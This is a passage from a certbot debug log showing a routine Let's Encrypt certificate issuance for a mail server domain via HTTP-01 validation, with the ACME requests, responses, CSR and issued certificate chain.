"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "pending",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
}
]
}
2026-02-14 23:36:29,053:DEBUG:acme.client:Storing nonce: qLPTsdtfmP9T29KLfsnuCiAy8NZJQArGPJFz89iLRfrTIc6DT2c
2026-02-14 23:36:29,053:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
2026-02-14 23:36:32,054:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:32,058:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1QOVQyOUtMZnNudUNpQXk4TlpKUUFyR1BKRno4OWlMUmZyVEljNkRUMmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
"signature": "Tj9IfzTtdCz-q_KVAJw7VwfALBFcfX8LhCyucOzvGJ6pP_pp5bA730VtR0j4heL81Hwfaz1Gsq44Yb_qGmqmEE3pYoeFS0JvN2b_nsEijMAx9P4Oxu0Ufrwduw0gUOPvk9IwbrrQ6eTbkpVJ7X2xxIdnAPueSkaA_lkYC6PxqJ3PIIRW9Ozfss3u-gXcYixZLFKEIMXoSGreZ4ipwY3jNfjJN_eaycbOz0bY-ln3ht_xTDCg44mWEtePtUp6b1q4fSqzY7bTcGlWpY_xsSPsWmUH8VZYqQfnS9Ias-7GySRJrH15uTbCv4N2F_JbDYxk61-xY_u7AN7S5UyeVWNlQw",
"payload": ""
}
2026-02-14 23:36:32,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 780
2026-02-14 23:36:32,237:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:32 GMT
Content-Type: application/json
Content-Length: 780
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "mail.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-16T23:36:30Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
"status": "valid",
"validated": "2026-02-14T23:36:11Z",
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24",
"validationRecord": [
{
"url": "http://mail.hanmocnn.co.kr/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24",
"hostname": "mail.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-14 23:36:32,237:DEBUG:acme.client:Storing nonce: qLPTsdtfmEvYkK_wxHKF9RSfcUUT1wUzsAB17jCVh9NDs3ikgz0
2026-02-14 23:36:32,237:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-14 23:36:32,238:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24
2026-02-14 23:36:32,238:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02L\nEj00oFN88yCY0O8V/Tkd/0PtOcnyxb+ydE/KAoB2JpmRNnRxtA17Uqe1ZhFA/ehX\nYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc/kKoDEwLwYJKoZIhvcN\nAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49\nBAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNL\ndiye5QCa6C3lVHECMCIX/Hyk7gp4sCW+XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zN\nzpUfaCYVlcFtuP6Znw==\n-----END CERTIFICATE REQUEST-----\n', form='pem')
2026-02-14 23:36:32,239:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:38:02.239703
2026-02-14 23:36:32,240:DEBUG:acme.client:JWS payload:
b'{\n "csr": "MIIBKTCBsAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEPKcT8XLoo1xwS02LEj00oFN88yCY0O8V_Tkd_0PtOcnyxb-ydE_KAoB2JpmRNnRxtA17Uqe1ZhFA_ehXYU3ZgdiDCzH1K8zOZUGKOnIWpsW50Z17xB9yobPvNlUWc_kKoDEwLwYJKoZIhvcNAQkOMSIwIDAeBgNVHREEFzAVghNtYWlsLmhhbm1vY25uLmNvLmtyMAoGCCqGSM49BAMCA2gAMGUCMQC9OAyPMN7sqWqGHxUDeGLkhlP3jiK8aODmOETTrBwWjReWYfNLdiye5QCa6C3lVHECMCIX_Hyk7gp4sCW-XOiTavmgA3ytDrSMpiIWQJfzzdcOH2zNzpUfaCYVlcFtuP6Znw"\n}'
2026-02-14 23:36:32,244:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0Zm1FdllrS193eEhLRjlSU2ZjVVVUMXdVenNBQjE3akNWaDlORHMzaWtnejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0",
"signature": "mCOEYzA48NByNR5p9Wzi-z2S6cMNG1MrJLtSAERYgabKYzhCjGFjEuxZLUz1VOaNDQ_9ejz5805yd2A5o2aNEDPdhseTeXZrG3zNwGvZ4IKBN8aLjhJEygriH2SKFJZWssq8mhSeHVN_ICrE6YTq5ihsb6o2ihTmmRQqKVgnNlj8XoXgGQl4Nq8k7257awIxAkvm3iWK-QbuwSiJCU-9Mj9B2wuPxO2Sjc_rNNXtWsrFC3koQA7Z0rgF_UT-gtj5CfLMsxdaP5SY995QXv-O9lY9yYC40edSE1hbnWoW2nx04Uc3LJrZ2SfvbPtYgnIj0E5GRPK2ZSw2ZcyUDCnJ3w",
"payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFUEtjVDhYTG9vMXh3UzAyTEVqMDBvRk44OHlDWTBPOFZfVGtkXzBQdE9jbnl4Yi15ZEVfS0FvQjJKcG1STm5SeHRBMTdVcWUxWmhGQV9laFhZVTNaZ2RpREN6SDFLOHpPWlVHS09uSVdwc1c1MFoxN3hCOXlvYlB2TmxVV2Nfa0tvREV3THdZSktvWklodmNOQVFrT01TSXdJREFlQmdOVkhSRUVGekFWZ2hOdFlXbHNMbWhoYm0xdlkyNXVMbU52TG10eU1Bb0dDQ3FHU000OUJBTUNBMmdBTUdVQ01RQzlPQXlQTU43c3FXcUdIeFVEZUdMa2hsUDNqaUs4YU9EbU9FVFRyQndXalJlV1lmTkxkaXllNVFDYTZDM2xWSEVDTUNJWF9IeWs3Z3A0c0NXLVhPaVRhdm1nQTN5dERyU01waUlXUUpmenpkY09IMnpOenBVZmFDWVZsY0Z0dVA2Wm53Igp9"
}
2026-02-14 23:36:37,057:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480370643826 HTTP/1.1" 200 455
2026-02-14 23:36:37,057:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:36 GMT
Content-Type: application/json
Content-Length: 455
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
Replay-Nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T23:36:11Z",
"identifiers": [
{
"type": "dns",
"value": "mail.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5"
}
2026-02-14 23:36:37,058:DEBUG:acme.client:Storing nonce: QkEzerAf0E6X65_9Bjtzue_QJCLFZEtmA7doUQlpM5e23i3Tlvk
2026-02-14 23:36:38,059:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:38,063:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZjBFNlg2NV85Qmp0enVlX1FKQ0xGWkV0bUE3ZG9VUWxwTTVlMjNpM1RsdmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzcwNjQzODI2In0",
"signature": "hi-_iTlLBN2nVItxQCfD5kxWh9EsOOdoYQSioZpkWKRAdRSr9L26fsb8sBkO0nf69jn5RI-11O26JA0u_w7LaaD1rCvR39tWDvdrsdIKuwxUZuxTU3sLu49y7XetmALVW6r-5do21DZAveY7ahzXmhpoG-WeY33B_2APSFlbg2fZ5dJQx_sF0i_o-OtksCgS06ODwWKP0THlc3dpcRfmn6AeKbYjBjduZCZn8WUtho6AcPy0WOVcZPtpl0HiL1aopYVgLpeGBZb0M31ixgVR8JPdCviemJ79a2tvxAIu56G55Zsxoi2hCcB0rfeQ0mCZRY2UKVCUE4qWbz2QpLVz1w",
"payload": ""
}
2026-02-14 23:36:38,242:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480370643826 HTTP/1.1" 200 455
2026-02-14 23:36:38,243:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:38 GMT
Content-Type: application/json
Content-Length: 455
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
Replay-Nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T23:36:11Z",
"identifiers": [
{
"type": "dns",
"value": "mail.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5"
}
2026-02-14 23:36:38,243:DEBUG:acme.client:Storing nonce: qLPTsdtf3ueEzlTXv-ytiM5j2C-SVQBDR5QGMdth3ZWFi80T__o
2026-02-14 23:36:38,243:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:38,248:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjN1ZUV6bFRYdi15dGlNNWoyQy1TVlFCRFI1UUdNZHRoM1pXRmk4MFRfX28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1In0",
"signature": "HTPcXpLVCGVP99416PBRlLwqk7JxPjp_WfRZcgJLPm1b-I71C96O4KR4lAxaO2TyIm39enpeHHDXCq8cO41ypoQwPT4qTVokDhMuO-rwwn1w1gih6YzR-erFCaqLBxMg_YsoEoSjTnfQ9SDhou8wPNur-fAAoHmXVoed8g7ZapbGjSikBkYX7YbVOkbstmFiV8Df_UgGB6Xm5-lVUnJ69p0eEu1-e4qyonFETOJ0kWjetMsdNtud9J6asRxnJas-ZbcR4rpcmRr-yiT6D-hwFfLIeNkZHEJGAn1E1g-uW3NPeAZdHh5aJ9wbykM5QfL1fIkhK7FCJTKKgdUSwoYwcg",
"payload": ""
}
2026-02-14 23:36:38,427:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5 HTTP/1.1" 200 2893
2026-02-14 23:36:38,428:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:38 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2893
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/1>;rel="alternate"
Replay-Nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h
aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij
XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm
EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC
EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/
BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU
jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC
hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j
bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc
aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE
gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A
AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq
LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o
B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ
5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2
TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU
1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ
A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
u1igv3OefnWjSQ==
-----END CERTIFICATE-----
2026-02-14 23:36:38,442:DEBUG:acme.client:Storing nonce: QkEzerAfvHenr9WRgSYKed7x868snGGgTeqk_BsqTqY3LnG8q7c
2026-02-14 23:36:38,442:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:36:38,446:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/1:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnZIZW5yOVdSZ1NZS2VkN3g4NjhzbkdHZ1RlcWtfQnNxVHFZM0xuRzhxN2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzODU4YTQ4NWMwMzMwMjUwZDZkZTcxMmMzMjlmZjI2ZmI1LzEifQ",
"signature": "X591XvnI02Agc3dUrxh3hTWlQ9gCVRZHBEs_5TIIqzRqx8dyj71RKnji0CdkxPE4JpPcAkJaixeiQau1uTqSpHs6ixfDPPrfDzNcLJlkyOXBdipNCuDD63tV3OPlcYEDdQXgUHQfikEjwWum2tHSzhvRX1szGkyq0UUGu_RM7JrrGe5e1l0wYhr_5c12dj0gA7V6L3sRTIHb9UpcO8p9_fszUSz5I7MZpP0grjXzqHiH9x5K2h_EQ8LvtPKe9CO85eX1ZufvZj-Np1cEyQOoNQf5dqxbXhNnwBMzAiJEv-XJvlqpGm-00pVcpSvTQqED_P0e2i3NhYPQZb91idGo9A",
"payload": ""
}
2026-02-14 23:36:38,624:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063858a485c0330250d6de712c329ff26fb5/1 HTTP/1.1" 200 2328
2026-02-14 23:36:38,625:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:38 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2328
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063858a485c0330250d6de712c329ff26fb5/0>;rel="alternate"
Replay-Nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDpTCCAyugAwIBAgISBjhYpIXAMwJQ1t5xLDKf8m+1MAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTQyMjM4MDJaFw0yNjA1MTUyMjM4MDFaMB4xHDAaBgNVBAMTE21h
aWwuaGFubW9jbm4uY28ua3IwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQ8pxPxcuij
XHBLTYsSPTSgU3zzIJjQ7xX9OR3/Q+05yfLFv7J0T8oCgHYmmZE2dHG0DXtSp7Vm
EUD96FdhTdmB2IMLMfUrzM5lQYo6chamxbnRnXvEH3Khs+82VRZz+QqjggIWMIIC
EjAOBgNVHQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/
BAIwADAdBgNVHQ4EFgQU5Yj9WqUvf/9B0wtxhkCGx9UUkvgwHwYDVR0jBBgwFoAU
jw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzAC
hhZodHRwOi8vZTguaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE21haWwuaGFubW9j
bm4uY28ua3IwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAioCCgHoYc
aHR0cDovL2U4LmMubGVuY3Iub3JnLzU0LmNybDCCAQMGCisGAQQB1nkCBAIEgfQE
gfEA7wB1AJaXZL9VWJet90OHaDcIQnfp8DrV9qTzNm5GpD8PyqnGAAABnF6DWw8A
AAQDAEYwRAIgFec+y9jrM6c9Lf3vNDFYxydQLd2FfYCWPsTKF7uKHKgCIEz1X+xq
LnqvKjoLhm/BC0lTehEdcDEoHAtcHbr9XubUAHYAZBHEbKQS7KeJHKICLgC8q08o
B9QeNSer6v7VA8l9zfAAAAGcXoNqZgAABAMARzBFAiBypKO0gNsH/Fqd4jK8Z9YJ
5gWAE+eEoxhkeKF9n1GF2AIhAMlIUgwLKtsj2UdZ6qWWp0Ew6L0mMg8E72tV0rn2
TuYyMAoGCCqGSM49BAMDA2gAMGUCMDPRlyHa6dwh8HioZ/du2eihye/hY9f3zuEU
1YDjNsVO3yMkkr0MgFkBzbFO/lQDeAIxAKQ36q4cNqNwYrOd2gsuXczOpUEAeoUJ
A0miZddVRI/uTm5o0sYlEABAQ5jE3I56Gw==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
-----END CERTIFICATE-----
2026-02-14 23:36:38,625:DEBUG:acme.client:Storing nonce: qLPTsdtfmv85WZpKILu_umBFIIsvcuyW1Y0hi5WT9olFTo9SIAY
2026-02-14 23:36:38,626:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-4.
2026-02-14 23:36:38,627:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-4.
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-4/cert.pem.
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-4/privkey.pem.
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-4/chain.pem.
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-4/fullchain.pem.
2026-02-14 23:36:38,628:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-4/README.
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
2026-02-14 23:36:38,639:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
